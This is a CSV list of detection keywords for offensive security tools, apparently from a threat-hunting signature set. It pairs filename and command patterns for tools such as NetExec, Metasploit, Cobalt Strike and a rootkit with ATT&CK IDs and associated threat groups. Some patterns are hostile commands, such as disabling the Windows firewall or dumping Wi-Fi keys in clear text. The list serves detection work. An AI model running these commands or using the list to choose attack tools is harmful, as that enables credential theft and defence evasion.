"*NetExec-main.zip*",".{0,1000}NetExec\-main\.zip.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","1","N/A","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","53152"
"*Net-GPPPassword.cs*",".{0,1000}Net\-GPPPassword\.cs.{0,1000}","offensive_tool_keyword","Net-GPPPassword",".NET implementation of Get-GPPPassword. Retrieves the plaintext password and other information for accounts pushed through Group Policy Preferences.","T1059.001 - T1552.007","TA0002 - TA0006","N/A","N/A","Credential Access","https://github.com/outflanknl/Net-GPPPassword","1","1","N/A","N/A","10","2","172","36","2019-12-18T10:14:32Z","2019-10-14T12:35:46Z","53153"
"*Net-GPPPassword.exe*",".{0,1000}Net\-GPPPassword\.exe.{0,1000}","offensive_tool_keyword","Net-GPPPassword",".NET implementation of Get-GPPPassword. Retrieves the plaintext password and other information for accounts pushed through Group Policy Preferences.","T1059.001 - T1552.007","TA0002 - TA0006","N/A","N/A","Credential Access","https://github.com/outflanknl/Net-GPPPassword","1","1","N/A","N/A","10","2","172","36","2019-12-18T10:14:32Z","2019-10-14T12:35:46Z","53154"
"*Net-GPPPassword_dotNET*",".{0,1000}Net\-GPPPassword_dotNET.{0,1000}","offensive_tool_keyword","Net-GPPPassword",".NET implementation of Get-GPPPassword. Retrieves the plaintext password and other information for accounts pushed through Group Policy Preferences.","T1059.001 - T1552.007","TA0002 - TA0006","N/A","N/A","Credential Access","https://github.com/outflanknl/Net-GPPPassword","1","1","N/A","N/A","10","2","172","36","2019-12-18T10:14:32Z","2019-10-14T12:35:46Z","53155"
"*Net-GPPPassword-master*",".{0,1000}Net\-GPPPassword\-master.{0,1000}","offensive_tool_keyword","Net-GPPPassword",".NET implementation of Get-GPPPassword. Retrieves the plaintext password and other information for accounts pushed through Group Policy Preferences.","T1059.001 - T1552.007","TA0002 - TA0006","N/A","N/A","Credential Access","https://github.com/outflanknl/Net-GPPPassword","1","1","N/A","N/A","10","2","172","36","2019-12-18T10:14:32Z","2019-10-14T12:35:46Z","53156"
"*nethunter-*.torrent*",".{0,1000}nethunter\-.{0,1000}\.torrent.{0,1000}","offensive_tool_keyword","kali","Kali Linux usage","T1210.001 - T1185 - T1059 - T1400 - T1506 - T1213","TA0001 - TA0002 - TA0009","N/A","Black Basta","Exploitation OS","https://www.kali.org/","1","1","#linux","N/A","10","10","N/A","N/A","N/A","N/A","53157"
"*nethunter-*.zip*",".{0,1000}nethunter\-.{0,1000}\.zip.{0,1000}","offensive_tool_keyword","kali","Kali Linux usage","T1210.001 - T1185 - T1059 - T1400 - T1506 - T1213","TA0001 - TA0002 - TA0009","N/A","Black Basta","Exploitation OS","https://www.kali.org/","1","1","#linux","N/A","10","10","N/A","N/A","N/A","N/A","53158"
"*nethunter-*-oos-ten-kalifs-full.zip*",".{0,1000}nethunter\-.{0,1000}\-oos\-ten\-kalifs\-full\.zip.{0,1000}","offensive_tool_keyword","kali","Kali Linux usage","T1210.001 - T1185 - T1059 - T1400 - T1506 - T1213","TA0001 - TA0002 - TA0009","N/A","Black Basta","Exploitation OS","https://www.kali.org/","1","1","#linux","N/A","10","10","N/A","N/A","N/A","N/A","53159"
"*NETKIT_LOG(""*",".{0,1000}NETKIT_LOG\(\"".{0,1000}","offensive_tool_keyword","netkit","Netkit is a purposefully small rootkit which can be used by clients over network to maintain a sneaky foothold into a device.","T1547 - T1021 - T1071 - T1562.001 - T1055 - T1041 - T1105","TA0003 - TA0005 - TA0002 - TA0007 - TA0009 - TA0040","N/A","N/A","Defense Evasion","https://github.com/Notselwyn/netkit","1","0","N/A","N/A","10","1","30","7","2024-03-27T19:07:03Z","2023-07-19T00:00:45Z","53160"
"*NETKIT_XOR\x00*",".{0,1000}NETKIT_XOR\\x00.{0,1000}","offensive_tool_keyword","netkit","Netkit is a purposefully small rootkit which can be used by clients over network to maintain a sneaky foothold into a device.","T1547 - T1021 - T1071 - T1562.001 - T1055 - T1041 - T1105","TA0003 - TA0005 - TA0002 - TA0007 - TA0009 - TA0040","N/A","N/A","Defense Evasion","https://github.com/Notselwyn/netkit","1","0","N/A","N/A","10","1","30","7","2024-03-27T19:07:03Z","2023-07-19T00:00:45Z","53161"
"*netlm_downgrade.*",".{0,1000}netlm_downgrade\..{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","53162"
"*NETLMv2_fmt_plug.*",".{0,1000}NETLMv2_fmt_plug\..{0,1000}","offensive_tool_keyword","JohnTheRipper","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","Black Basta","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","N/A","10","11216","2220","2025-04-22T11:24:06Z","2011-12-16T19:43:47Z","53163"
"*NetLoader.exe --path *.exe *",".{0,1000}NetLoader\.exe\s\-\-path\s.{0,1000}\.exe\s.{0,1000}","offensive_tool_keyword","NetLoader","Loads any C# binary in memory - patching AMSI + ETW","T1055.012 - T1112 - T1562.001","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/Flangvik/NetLoader","1","0","N/A","N/A","10","9","820","147","2021-10-03T16:41:03Z","2020-05-05T15:20:16Z","53164"
"*NetLoader-master*",".{0,1000}NetLoader\-master.{0,1000}","offensive_tool_keyword","NetLoader","Loads any C# binary in memory - patching AMSI + ETW","T1055.012 - T1112 - T1562.001","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/Flangvik/NetLoader","1","1","N/A","N/A","10","9","820","147","2021-10-03T16:41:03Z","2020-05-05T15:20:16Z","53165"
"*netloggedonusers.*",".{0,1000}netloggedonusers\..{0,1000}","offensive_tool_keyword","silenttrinity","SILENTTRINITY is modern. asynchronous. multiplayer & multiserver C2/post-exploitation framework powered by Python 3 and .NETs DLR. Its the culmination of an extensive amount of research into using embedded third-party .NET scripting languages to dynamically call .NET APIs. a technique the author coined as BYOI (Bring Your Own Interpreter). The aim of this tool and the BYOI concept is to shift the paradigm back to PowerShell style like attacks (as it offers much more flexibility over traditional C# tradecraft) only without using PowerShell in anyway.","T1548.002 - T1134.001 - T1087.002 - T1010 - T1547.001 - T1059.001 - T1059.003 - T1059.006 - T1543.003 - T1555.003 - T1555.004 - T1546.001 - T1546.003 - T1546.015 - T1041 - T1083 - T1564.003 - T1562.001 - T1562.003 - T1070 - T1070.004 - T1105 - T1056.001 - T1056.002 - T1556 - T1112 - T1106 - T1046 - T1135 - T1003.001 - T1069.001 - T1069.002 - T1057 - T1055 - T1012 - T1021.003 - T1021.006 - T1018 - T1113 - T1518.001 - T1558.003 - T1082 - T1033 - T1007 - T1124 - T1552.006 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/byt3bl33d3r/SILENTTRINITY","1","1","N/A","N/A","N/A","10","2239","416","2023-12-06T17:17:24Z","2018-09-25T15:17:30Z","53166"
"*netlogon_##*",".{0,1000}netlogon_\#\#.{0,1000}","offensive_tool_keyword","cobaltstrike","A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/bluscreenofjeff/Malleable-C2-Randomizer","1","1","N/A","N/A","10","10","444","87","2022-09-09T15:50:16Z","2017-05-31T15:44:43Z","53167"
"*netntlm.pl *",".{0,1000}netntlm\.pl\s.{0,1000}","offensive_tool_keyword","JohnTheRipper","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","Black Basta","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","N/A","10","11216","2220","2025-04-22T11:24:06Z","2011-12-16T19:43:47Z","53168"
"*NetNTLMtoSilverTicket.git*",".{0,1000}NetNTLMtoSilverTicket\.git.{0,1000}","offensive_tool_keyword","NetNTLMtoSilverTicket","Obtaining NetNTLMv1 Challenge/Response authentication - cracking those to NTLM Hashes and using that NTLM Hash to sign a Kerberos Silver ticket.","T1110.001 - T1558.003 - T1558.004","TA0006 - TA0008 - TA0002","N/A","N/A","Credential Access","https://github.com/NotMedic/NetNTLMtoSilverTicket","1","1","N/A","N/A","10","9","842","113","2021-07-26T15:16:20Z","2019-01-14T15:32:27Z","53169"
"*NetNTLMtoSilverTicket-master*",".{0,1000}NetNTLMtoSilverTicket\-master.{0,1000}","offensive_tool_keyword","NetNTLMtoSilverTicket","Obtaining NetNTLMv1 Challenge/Response authentication - cracking those to NTLM Hashes and using that NTLM Hash to sign a Kerberos Silver ticket.","T1110.001 - T1558.003 - T1558.004","TA0006 - TA0008 - TA0002","N/A","N/A","Credential Access","https://github.com/NotMedic/NetNTLMtoSilverTicket","1","1","N/A","N/A","10","9","842","113","2021-07-26T15:16:20Z","2019-01-14T15:32:27Z","53170"
"*netpass.exe*",".{0,1000}netpass\.exe.{0,1000}","offensive_tool_keyword","netpass","When you connect to a network share on your LAN or to your .NET Passport account. Windows allows you to save your password in order to use it in each time that you connect the remote server. This utility recovers all network passwords stored on your system for the current logged-on user. It can also recover the passwords stored in Credentials file of external drive. as long as you know the last log-on password.","T1081 - T1003 - T1555","TA0006 - TA0009","N/A","Kimsuky - XDSpy - TRAVELING SPIDER","Credential Access","https://www.nirsoft.net/utils/network_password_recovery.html","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","53171"
"*netpass.zip*",".{0,1000}netpass\.zip.{0,1000}","offensive_tool_keyword","netpass","When you connect to a network share on your LAN or to your .NET Passport account. Windows allows you to save your password in order to use it in each time that you connect the remote server. This utility recovers all network passwords stored on your system for the current logged-on user. It can also recover the passwords stored in Credentials file of external drive. as long as you know the last log-on password.","T1081 - T1003 - T1555","TA0006 - TA0009","N/A","Kimsuky - XDSpy - TRAVELING SPIDER","Credential Access","https://www.nirsoft.net/utils/network_password_recovery.html","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","53172"
"*netpass_x64.exe*",".{0,1000}netpass_x64\.exe.{0,1000}","offensive_tool_keyword","netpass","When you connect to a network share on your LAN or to your .NET Passport account. Windows allows you to save your password in order to use it in each time that you connect the remote server. This utility recovers all network passwords stored on your system for the current logged-on user. It can also recover the passwords stored in Credentials file of external drive. as long as you know the last log-on password.","T1081 - T1003 - T1555","TA0006 - TA0009","N/A","Kimsuky - XDSpy - TRAVELING SPIDER","Credential Access","https://www.nirsoft.net/utils/network_password_recovery.html","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","53173"
"*netpass-x64.zip*",".{0,1000}netpass\-x64\.zip.{0,1000}","offensive_tool_keyword","netpass","When you connect to a network share on your LAN or to your .NET Passport account. Windows allows you to save your password in order to use it in each time that you connect the remote server. This utility recovers all network passwords stored on your system for the current logged-on user. It can also recover the passwords stored in Credentials file of external drive. as long as you know the last log-on password.","T1081 - T1003 - T1555","TA0006 - TA0009","N/A","Kimsuky - XDSpy - TRAVELING SPIDER","Credential Access","https://www.nirsoft.net/utils/network_password_recovery.html","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","53174"
"*NetRipper DLL (32 bits) successfully compiled*",".{0,1000}NetRipper\sDLL\s\(32\sbits\)\ssuccessfully\scompiled.{0,1000}","offensive_tool_keyword","NetRipper","NetRipper - Smart traffic sniffing for penetration testers","T1173 - T1557 - T1573.001 - T1056.001","TA0009 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/NytroRST/NetRipper","1","0","N/A","N/A","10","10","1368","318","2022-06-17T21:08:54Z","2015-07-14T20:31:04Z","53176"
"*NetRipper DLL (64 bits) successfully compiled*",".{0,1000}NetRipper\sDLL\s\(64\sbits\)\ssuccessfully\scompiled.{0,1000}","offensive_tool_keyword","NetRipper","NetRipper - Smart traffic sniffing for penetration testers","T1173 - T1557 - T1573.001 - T1056.001","TA0009 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/NytroRST/NetRipper","1","0","N/A","N/A","10","10","1368","318","2022-06-17T21:08:54Z","2015-07-14T20:31:04Z","53177"
"*netsh add helper netshBad.DLL*",".{0,1000}netsh\sadd\shelper\snetshBad\.DLL.{0,1000}","offensive_tool_keyword","Offensive-Netsh-Helper","Maintain Windows Persistence with an evil Netshell Helper DLL","T1174 - T1055.011 - T1546.013 - T1574.002 - T1105","TA0003 ","N/A","N/A","Persistence","https://github.com/rtcrowley/Offensive-Netsh-Helper","1","0","N/A","N/A","9","1","12","5","2018-07-28T02:12:09Z","2018-07-25T22:49:20Z","53184"
"*netsh advfirewall firewall add rule *Deny Outbound for *",".{0,1000}netsh\sadvfirewall\sfirewall\sadd\srule\s.{0,1000}Deny\sOutbound\sfor\s.{0,1000}","offensive_tool_keyword","AutoPwnKey","red teaming framework and testing tool using AutoHotKey","T1059.007 - T1204.002 - T1564.004 - T1105 - T1087 - T1069 - T1027 - T1218 - T1548.002 - T1547 - T1056.001 - T1021.001 - T1102 - T1573 - T1499 - T1565","TA0001 - TA0007 - TA0005 - TA0004 - TA0003 - TA0006 - TA0008 - TA0011 - TA0040","N/A","N/A","Exploitation tool","https://github.com/CroodSolutions/AutoPwnKey","1","0","#firewallrulename","N/A","10","1","25","5","2025-04-11T21:52:48Z","2024-08-14T05:05:33Z","53185"
"*netsh firewall set opmode disable*",".{0,1000}netsh\sfirewall\sset\sopmode\sdisable.{0,1000}","offensive_tool_keyword","responder","LLMNR. NBT-NS and MDNS poisoner","T1557.001 - T1171 - T1547.011 - T1040","TA0011 - TA0006 - TA0007","N/A","Lazarus Group - APT28 - FANCY BEAR - EMBER BEAR","Sniffing & Spoofing","https://github.com/lgandx/Responder-Windows/","1","0","N/A","N/A","N/A","6","523","137","2024-07-30T11:10:05Z","2015-02-07T22:59:04Z","53195"
"*netsh wlan show profile $wlan key=clear | Select-String *?<=Key Content\s+:\s*",".{0,1000}netsh\swlan\sshow\sprofile\s\$wlan\skey\=clear\s\|\sSelect\-String\s.{0,1000}\?\<\=Key\sContent\\s\+\:\\s.{0,1000}","offensive_tool_keyword","WLAN-Windows-Passwords","Opens PowerShell hidden - grabs wlan passwords - saves as a cleartext in a variable and exfiltrates info via Discord Webhook.","T1056.005 - T1552.001 - T1119 - T1071.001","TA0004 - TA0006 - TA0010 - TA0040","N/A","N/A","Credential Access","https://github.com/hak5/omg-payloads/tree/master/payloads/library/credentials/WLAN-Windows-Passwords","1","0","N/A","N/A","10","10","904","310","2024-09-14T02:34:26Z","2021-09-08T20:33:18Z","53206"
"*netsh* firewall set opmode disable*",".{0,1000}netsh\sfirewall\sset\sopmode\sdisable.{0,1000}","offensive_tool_keyword","netsh","used by responder - LLMNR. NBT-NS and MDNS poisoner","T1557.001 - T1171 - T1547.011 - T1040","TA0011 - TA0006 - TA0007","N/A","Lazarus Group - APT28 - FANCY BEAR - EMBER BEAR","Sniffing & Spoofing","https://github.com/lgandx/Responder-Windows/","1","0","N/A","N/A","N/A","6","523","137","2024-07-30T11:10:05Z","2015-02-07T22:59:04Z","53208"
"*netsh.exe interface ip delete arpcache >C:\Windows\TEMP\ipconfig.out 2>&1*",".{0,1000}netsh\.exe\sinterface\sip\sdelete\sarpcache\s\>C\:\\Windows\\TEMP\\ipconfig\.out\s2\>\&1.{0,1000}","offensive_tool_keyword","KerberOPSEC","OPSEC safe Kerberoasting in C#","T1558.003","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/Luct0r/KerberOPSEC","1","0","N/A","N/A","10","2","191","21","2022-06-14T18:10:25Z","2022-01-07T17:20:40Z","53212"
"*NetshHelperBeacon.exe*",".{0,1000}NetshHelperBeacon\.exe.{0,1000}","offensive_tool_keyword","NetshHelperBeacon","DLL to load from Windows NetShell. Will pop calc and execute shellcode.","T1055 - T1218","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/outflanknl/NetshHelperBeacon","1","1","N/A","N/A","10","2","179","36","2016-09-26T19:57:08Z","2016-09-26T12:52:02Z","53216"
"*netsniff-ng*",".{0,1000}netsniff\-ng.{0,1000}","offensive_tool_keyword","netsniff-ng","netsniff-ng is a high performance Linux network sniffer for packet inspection. It can be used for protocol analysis. reverse engineering or network debugging. The gain of performance is reached by 'zero-copy' mechanisms. so that the kernel does not need to copy packets from kernelspace to userspace.","T1040  -  T1052 - T1065 - T1096 - T1102 - T1113 - T1114 - T1123 - T1127 - T1136 - T1143 - T1190 - T1200 - T1201 - T1219 - T1222 - T1496 - T1497 - T1557 - T1560 - T1573 - T1574 - T1608","TA0001 - TA0002 - TA0003 - TA0007 - TA0011","N/A","N/A","Sniffing & Spoofing","https://packages.debian.org/fr/sid/netsniff-ng","1","1","#linux","N/A","N/A","N/A","N/A","N/A","N/A","N/A","53218"
"*NetSPI/Powershell-Modules*",".{0,1000}NetSPI\/Powershell\-Modules.{0,1000}","offensive_tool_keyword","PowerUpSQL","NetSPI powershell modules to gather credentials","T1552.001 - T1555.004 - T1003","TA0006 - TA0009 - TA0010","N/A","Black Basta - Dispossessor","Credential Access","https://github.com/NetSPI/Powershell-Modules","1","1","N/A","N/A","10","2","168","101","2019-06-06T15:54:47Z","2014-02-28T21:24:21Z","53219"
"*netstat -tnlp || ss -tnlp*",".{0,1000}netstat\s\-tnlp\s\|\|\sss\s\-tnlp.{0,1000}","offensive_tool_keyword","linux-smart-enumeration","Linux enumeration tool for privilege escalation and discovery","T1087.004 - T1016 - T1548.001 - T1046","TA0007 - TA0004 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/diego-treitos/linux-smart-enumeration","1","0","#linux","N/A","9","10","3575","584","2023-12-25T14:46:47Z","2019-02-13T11:02:21Z","53222"
"*netstat -unlp || ss -unlp*",".{0,1000}netstat\s\-unlp\s\|\|\sss\s\-unlp.{0,1000}","offensive_tool_keyword","linux-smart-enumeration","Linux enumeration tool for privilege escalation and discovery","T1087.004 - T1016 - T1548.001 - T1046","TA0007 - TA0004 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/diego-treitos/linux-smart-enumeration","1","0","#linux","N/A","9","10","3575","584","2023-12-25T14:46:47Z","2019-02-13T11:02:21Z","53223"
"*nettitude/ETWHash*",".{0,1000}nettitude\/ETWHash.{0,1000}","offensive_tool_keyword","ETWHash","C# POC to extract NetNTLMv1/v2 hashes from ETW provider","T1556.001","TA0009 ","N/A","N/A","Credential Access","https://github.com/nettitude/ETWHash","1","1","N/A","N/A","N/A","3","256","29","2023-05-10T06:45:06Z","2023-04-26T15:53:01Z","53236"
"*nettitude/MalSCCM*",".{0,1000}nettitude\/MalSCCM.{0,1000}","offensive_tool_keyword","MalSCCM","This tool allows you to abuse local or remote SCCM servers to deploy malicious applications to hosts they manage","T1072 - T1059.005 - T1090","TA0008 - TA0002 - TA0011","N/A","N/A","Exploitation tool","https://github.com/nettitude/MalSCCM","1","1","N/A","N/A","10","3","246","37","2023-09-28T17:29:50Z","2022-05-04T08:27:27Z","53237"
"*netuser_enum*",".{0,1000}netuser_enum.{0,1000}","offensive_tool_keyword","cobaltstrike","Situational Awareness commands implemented using Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/trustedsec/CS-Situational-Awareness-BOF","1","1","N/A","N/A","10","10","1389","234","2025-03-26T19:36:31Z","2020-07-15T16:21:18Z","53238"
"*netview.py*",".{0,1000}netview\.py.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR  - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Sniffing & Spoofing","https://github.com/SecureAuthCorp/impacket","1","1","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","53239"
"*netview_enum*",".{0,1000}netview_enum.{0,1000}","offensive_tool_keyword","cobaltstrike","Situational Awareness commands implemented using Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/trustedsec/CS-Situational-Awareness-BOF","1","1","N/A","N/A","10","10","1389","234","2025-03-26T19:36:31Z","2020-07-15T16:21:18Z","53240"
"*Netwedx765ork\\Cookedx765ies*",".{0,1000}Netwedx765ork\\\\Cookedx765ies.{0,1000}","offensive_tool_keyword","LummaC2-Stealer-sample","artifacts from a specific sample of lumma stealer - source code on github","T1204.002 - T1566.001 - T1059.003 - T1027 - T1140 - T1555.003 - T1557.001 - T1083 - T1560.001 - T1041 - T1567 - T1071.001 - T1105 - T1539","TA0006 - TA0010","Lumma Stealer","N/A","Credential Access","https://github.com/x86byte/LummaC2-Stealer","1","0","#content","can be used for yara scans","10","1","31","5","2025-02-18T00:38:59Z","2025-02-15T12:28:05Z","53241"
"*Network Password Recovery v*",".{0,1000}Network\sPassword\sRecovery\sv.{0,1000}","offensive_tool_keyword","netpass","When you connect to a network share on your LAN or to your .NET Passport account. Windows allows you to save your password in order to use it in each time that you connect the remote server. This utility recovers all network passwords stored on your system for the current logged-on user. It can also recover the passwords stored in Credentials file of external drive. as long as you know the last log-on password.","T1081 - T1003 - T1555","TA0006 - TA0009","N/A","Kimsuky - XDSpy - TRAVELING SPIDER","Credential Access","https://www.nirsoft.net/utils/network_password_recovery.html","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","53242"
"*network2john.lua*",".{0,1000}network2john\.lua.{0,1000}","offensive_tool_keyword","JohnTheRipper","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","Black Basta","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","N/A","10","11216","2220","2025-04-22T11:24:06Z","2011-12-16T19:43:47Z","53243"
"*networking\dhcp_dns_update_utils.py*",".{0,1000}networking\\dhcp_dns_update_utils\.py.{0,1000}","offensive_tool_keyword","DDSpoof","DDSpoof is a tool that enables DHCP DNS Dynamic Update attacks against Microsoft DHCP servers in AD environments.","T1557 - T1584 - T1203","TA0005 - TA0003 TA0011","N/A","N/A","Sniffing & Spoofing","https://github.com/akamai/DDSpoof","1","0","N/A","N/A","9","2","122","13","2024-04-12T22:06:02Z","2023-12-14T06:47:45Z","53244"
"*NetworkMiner*",".{0,1000}NetworkMiner.{0,1000}","offensive_tool_keyword","NetworkMiner","A Network Forensic Analysis Tool (NFAT)","T1040  -  T1052 - T1065 - T1096 - T1102 - T1113 - T1114 - T1123 - T1127 - T1136 - T1143 - T1190 - T1200 - T1201 - T1219 - T1222 - T1496 - T1497 - T1557 - T1560 - T1573 - T1574 - T1608","TA0001 - TA0002 - TA0003 - TA0007 - TA0011","N/A","N/A","Sniffing & Spoofing","http://www.netresec.com/?page=NetworkMiner","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","53245"
"*NetworkServiceExploit.exe*",".{0,1000}NetworkServiceExploit\.exe.{0,1000}","offensive_tool_keyword","NetworkServiceExploit","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","1","N/A","NetworkServiceExploit","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","53246"
